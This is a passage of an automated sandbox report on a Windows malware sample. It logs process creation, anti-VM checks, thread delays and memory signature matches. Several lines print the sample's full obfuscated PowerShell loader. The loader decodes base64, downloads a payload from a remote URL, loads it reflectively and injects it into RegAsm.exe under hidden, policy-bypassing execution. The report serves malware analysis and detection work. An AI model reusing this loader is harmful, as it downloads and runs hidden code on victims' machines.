                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTR
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB4B2B9E79 sldt word ptr fs:[eax]4_2_00007FFB4B2B9E79
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1615Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1626Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3460Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6375Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1012Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep count: 3460 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep count: 6375 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: powershell.exe, 00000004.00000002.1594074880.000001A064A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbU1RySW5HXSR2RVJib1NFUHJFZmVSRU5DRSlbMSwzXSsneCctam9JbicnKSggKCdETCcrJ2p1cmwnKycgPScrJyBGeUwnKydodHRwczonKycvL2lhNicrJzAwJysnMTAnKycwJysnLnVzLmFyY2hpdmUub3JnJysnLzInKyc0JysnL2l0ZW1zL2RlJysndGFoLW5vdGUtdi9EZXQnKydhJysnaE5vdGUnKydWJysnLnR4dCcrJ0Z5TDtETGpiJysnYXNlNicrJzRDb250ZW4nKyd0ID0nKycgJysnKCcrJ05ldy1PYmplY3QgJysnU3lzJysndGVtJysnLk5ldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLkRvJysndycrJ24nKydsbycrJ2FkU3RyJysnaW5nKERMaicrJ3VybCk7JysnRExqYicrJ2luYScrJ3J5Q29udGVudCAnKyc9IFtTeXMnKyd0ZW0uQ29udmVydF06JysnOkYnKydyb21CYXNlNjRTdHInKydpbicrJ2coRCcrJ0xqJysnYmEnKydzZTY0Q29udGVudCknKyc7REwnKydqYXMnKydzZScrJ20nKydibHkgPSBbJysnUmVmbGVjJysndCcrJ2knKydvbicrJy5BJysncycrJ3NlbScrJ2JsJysneScrJ10nKyc6OkwnKydvJysnYWQoRCcrJ0xqYmluYXInKyd5Q29uJysndGVudCcrJyk7RExqdCcrJ3knKydwJysnZSA9IERMamFzcycrJ2VtYmx5LkdldFQnKyd5cGUnKycoRnlMUnVuUEUnKycuSG8nKydtJysnZUZ5TCk7RExqJysnbScrJ2UnKyd0aG8nKydkID0gJysnRExqJysndCcrJ3knKydwZScrJy4nKydHZScrJ3RNJysnZXRob2QoJysnRnlMVkFJRnlMKTtEJysnTGptZXRob2QnKycuSW4nKyd2b2tlKERMJysnam51bGwsIFtvYmplY3RbXV1AKEZ5JysnTHR4dC5pbGltbScrJy92ZWQnKycuMnIuMzliMzQ1MzAnKycyYTA3NScrJ2IxYmMnKycwJysnZDQnKyc1YjYzJysnMmViOWVlNjItYnVwJysnLy86cycrJ3B0JysndCcrJ2gnKydGJysneUwgJysnLCBGeUwnKydkZXNhdGl2YWQnKydvRnknKydMICwnKycgRicrJ3lMZGVzYXRpdmEnKydkb0Z5TCcrJyAsIEYnKyd5TGRlcycrJ2F0aScrJ3ZhZG9GJysneScrJ0wsJysnRnknKydMUmVnQXNtRnlMLEZ5JysnTEZ5TCkpJykucmVQbEFDRSgnRExqJywnJCcpLnJlUGxBQ0UoJ0Z5TCcsW1N0UmluZ11bQ0hhcl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STrInG]$vERboSEPrEfeRENCE)[1,3]+'x'-joIn'')( ('DL'+'jurl'+' ='+' FyL'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/Det'+'a'+'hNote'+'V'+'.txt'+'FyL;DLjb'+'ase6'+'4Conten'+'t ='+' '+'('+'New-Object '+'Sys'+'tem'+'.Net.'+'We'+'bCli'+'e'+'nt'+').Do'+'w'+'n'+'lo'+'adStr'+'ing(DLj'+'url);'+'DLjb'+'ina'+'ryContent '+'= [Sys'+'tem.Convert]:'+':F'+'romBase64Str'+'in'+'g(D'+'Lj'+'ba'+'se64Content)'+';DL'+'jas'+'se'+'m'+'bly = ['+'Reflec'+'t'+'i'+'on'+'.A'+'s'+'sem'+'bl'+'y'+']'+'::L'+'o'+'ad(D'+'Ljbinar'+'yCon'+'tent'+');DLjt'+'y'+'p'+'e = DLjass'+'embly.GetT'+'ype'+'(FyLRunPE'+'.Ho'+'m'+'eFyL);DLj'+'m'+'e'+'tho'+'d = '+'DLj'+'t'+'y'+'pe'+'.'+'Ge'+'tM'+'ethod('+'FyLVAIFyL);D'+'Ljmethod'+'.In'+'voke(DL'+'jnull, [object[]]@(Fy'+'Ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'F'+'yL '+', FyL'+'desativad'+'oFy'+'L ,'+' F'+'yLdesativa'+'doFyL'+' , F'+'yLdes'+'ati'+'vadoF'+'y'+'L,'+'Fy'+'LRegAsmFyL,Fy'+'LFyL))').rePlACE('DLj','$').rePlACE('FyL',[StRing][CHar]39) )"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoichbu1rysw5hxsr2rvjib1nfuhjfzmvsru5drslbmswzxssnecctam9jbicnksggkcdetccrj2p1cmwnkycgpscrjybgeuwnkydodhrwczonkycvl2lhnicrjzawjysnmtankycwjysnlnvzlmfyy2hpdmuub3jnjysnlzinkyc0jysnl2l0zw1zl2rljysndgfolw5vdgutdi9ezxqnkydhjysnae5vdgunkydwjysnlnr4dccrj0z5tdtetgpijysnyxnlnicrjzrdb250zw4nkyd0id0nkycgjysnkccrj05ldy1pymply3qgjysnu3lzjysndgvtjysnlk5ldc4nkydxzscrj2jdbgknkydljysnbnqnkycplkrvjysndycrj24nkydsbycrj2fku3ryjysnaw5nkermaicrj3vybck7jysnrexqyicrj2luyscrj3j5q29udgvudcankyc9ifttexmnkyd0zw0uq29udmvydf06jysnokynkydyb21cyxnlnjrtdhinkydpbicrj2corccrj0xqjysnymenkydzzty0q29udgvudcknkyc7rewnkydqyxmnkydzzscrj20nkydibhkgpsbbjysnumvmbgvjjysndccrj2knkydvbicrjy5bjysncycrj3nlbscrj2jsjysnescrj10nkyc6okwnkydvjysnywqorccrj0xqymluyxinkyd5q29ujysndgvudccrjyk7rexqdccrj3knkydwjysnzsa9iermamfzcycrj2vtymx5lkdldfqnkyd5cgunkycornlmunvuueunkycusg8nkydtjysnzuz5tck7rexqjysnbscrj2unkyd0ag8nkydkid0gjysnrexqjysndccrj3knkydwzscrjy4nkydhzscrj3rnjysnzxrob2qojysnrnlmvkfjrnlmkttejysntgptzxrob2qnkycusw4nkyd2b2tlkermjysnam51bgwsiftvymply3rbxv1akez5jysnthr4dc5pbgltbscrjy92zwqnkycumniumzlimzq1mzankycyyta3nscrj2ixymmnkycwjysnzdqnkyc1yjyzjysnmmviowvlnjitynvwjysnly86cycrj3b0jysndccrj2gnkydgjysneuwgjysnlcbgeuwnkydkzxnhdgl2ywqnkydvrnknkydmicwnkycgricrj3lmzgvzyxrpdmenkydkb0z5tccrjyasieynkyd5tgrlcycrj2f0ascrj3zhzg9gjysnescrj0wsjysnrnknkydmumvnqxntrnlmlez5jysntez5tckpjykucmvqbefdrsgnrexqjywnjccplnjlugxbq0uoj0z5tccsw1n0umluz11bq0hhcl0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')( ('dl'+'jurl'+' ='+' fyl'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/det'+'a'+'hnote'+'v'+'.txt'+'fyl;dljb'+'ase6'+'4conten'+'t ='+' '+'('+'new-object '+'sys'+'tem'+'.net.'+'we'+'bcli'+'e'+'nt'+').do'+'w'+'n'+'lo'+'adstr'+'ing(dlj'+'url);'+'dljb'+'ina'+'rycontent '+'= [sys'+'tem.convert]:'+':f'+'rombase64str'+'in'+'g(d'+'lj'+'ba'+'se64content)'+';dl'+'jas'+'se'+'m'+'bly = ['+'reflec'+'t'+'i'+'on'+'.a'+'s'+'sem'+'bl'+'y'+']'+'::l'+'o'+'ad(d'+'ljbinar'+'ycon'+'tent'+');dljt'+'y'+'p'+'e = dljass'+'embly.gett'+'ype'+'(fylrunpe'+'.ho'+'m'+'efyl);dlj'+'m'+'e'+'tho'+'d = '+'dlj'+'t'+'y'+'pe'+'.'+'ge'+'tm'+'ethod('+'fylvaifyl);d'+'ljmethod'+'.in'+'voke(dl'+'jnull, [object[]]@(fy'+'ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'f'+'yl '+', fyl'+'desativad'+'ofy'+'l ,'+' f'+'yldesativa'+'dofyl'+' , f'+'yldes'+'ati'+'vadof'+'y'+'l,'+'fy'+'lregasmfyl,fy'+'lfyl))').replace('dlj','$').replace('fyl',[string][char]39) )"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoichbu1rysw5hxsr2rvjib1nfuhjfzmvsru5drslbmswzxssnecctam9jbicnksggkcdetccrj2p1cmwnkycgpscrjybgeuwnkydodhrwczonkycvl2lhnicrjzawjysnmtankycwjysnlnvzlmfyy2hpdmuub3jnjysnlzinkyc0jysnl2l0zw1zl2rljysndgfolw5vdgutdi9ezxqnkydhjysnae5vdgunkydwjysnlnr4dccrj0z5tdtetgpijysnyxnlnicrjzrdb250zw4nkyd0id0nkycgjysnkccrj05ldy1pymply3qgjysnu3lzjysndgvtjysnlk5ldc4nkydxzscrj2jdbgknkydljysnbnqnkycplkrvjysndycrj24nkydsbycrj2fku3ryjysnaw5nkermaicrj3vybck7jysnrexqyicrj2luyscrj3j5q29udgvudcankyc9ifttexmnkyd0zw0uq29udmvydf06jysnokynkydyb21cyxnlnjrtdhinkydpbicrj2corccrj0xqjysnymenkydzzty0q29udgvudcknkyc7rewnkydqyxmnkydzzscrj20nkydibhkgpsbbjysnumvmbgvjjysndccrj2knkydvbicrjy5bjysncycrj3nlbscrj2jsjysnescrj10nkyc6okwnkydvjysnywqorccrj0xqymluyxinkyd5q29ujysndgvudccrjyk7rexqdccrj3knkydwjysnzsa9iermamfzcycrj2vtymx5lkdldfqnkyd5cgunkycornlmunvuueunkycusg8nkydtjysnzuz5tck7rexqjysnbscrj2unkyd0ag8nkydkid0gjysnrexqjysndccrj3knkydwzscrjy4nkydhzscrj3rnjysnzxrob2qojysnrnlmvkfjrnlmkttejysntgptzxrob2qnkycusw4nkyd2b2tlkermjysnam51bgwsiftvymply3rbxv1akez5jysnthr4dc5pbgltbscrjy92zwqnkycumniumzlimzq1mzankycyyta3nscrj2ixymmnkycwjysnzdqnkyc1yjyzjysnmmviowvlnjitynvwjysnly86cycrj3b0jysndccrj2gnkydgjysneuwgjysnlcbgeuwnkydkzxnhdgl2ywqnkydvrnknkydmicwnkycgricrj3lmzgvzyxrpdmenkydkb0z5tccrjyasieynkyd5tgrlcycrj2f0ascrj3zhzg9gjysnescrj0wsjysnrnknkydmumvnqxntrnlmlez5jysntez5tckpjykucmvqbefdrsgnrexqjywnjccplnjlugxbq0uoj0z5tccsw1n0umluz11bq0hhcl0zoskgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')( ('dl'+'jurl'+' ='+' fyl'+'https:'+'//ia6'+'00'+'10'+'0'+'.us.archive.org'+'/2'+'4'+'/items/de'+'tah-note-v/det'+'a'+'hnote'+'v'+'.txt'+'fyl;dljb'+'ase6'+'4conten'+'t ='+' '+'('+'new-object '+'sys'+'tem'+'.net.'+'we'+'bcli'+'e'+'nt'+').do'+'w'+'n'+'lo'+'adstr'+'ing(dlj'+'url);'+'dljb'+'ina'+'rycontent '+'= [sys'+'tem.convert]:'+':f'+'rombase64str'+'in'+'g(d'+'lj'+'ba'+'se64content)'+';dl'+'jas'+'se'+'m'+'bly = ['+'reflec'+'t'+'i'+'on'+'.a'+'s'+'sem'+'bl'+'y'+']'+'::l'+'o'+'ad(d'+'ljbinar'+'ycon'+'tent'+');dljt'+'y'+'p'+'e = dljass'+'embly.gett'+'ype'+'(fylrunpe'+'.ho'+'m'+'efyl);dlj'+'m'+'e'+'tho'+'d = '+'dlj'+'t'+'y'+'pe'+'.'+'ge'+'tm'+'ethod('+'fylvaifyl);d'+'ljmethod'+'.in'+'voke(dl'+'jnull, [object[]]@(fy'+'ltxt.ilimm'+'/ved'+'.2r.39b34530'+'2a075'+'b1bc'+'0'+'d4'+'5b63'+'2eb9ee62-bup'+'//:s'+'pt'+'t'+'h'+'f'+'yl '+', fyl'+'desativad'+'ofy'+'l ,'+' f'+'yldesativa'+'dofyl'+' , f'+'yldes'+'ati'+'vadof'+'y'+'l,'+'fy'+'lregasmfyl,fy'+'lfyl))').replace('dlj','$').replace('fyl',[string][char]39) )"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTR
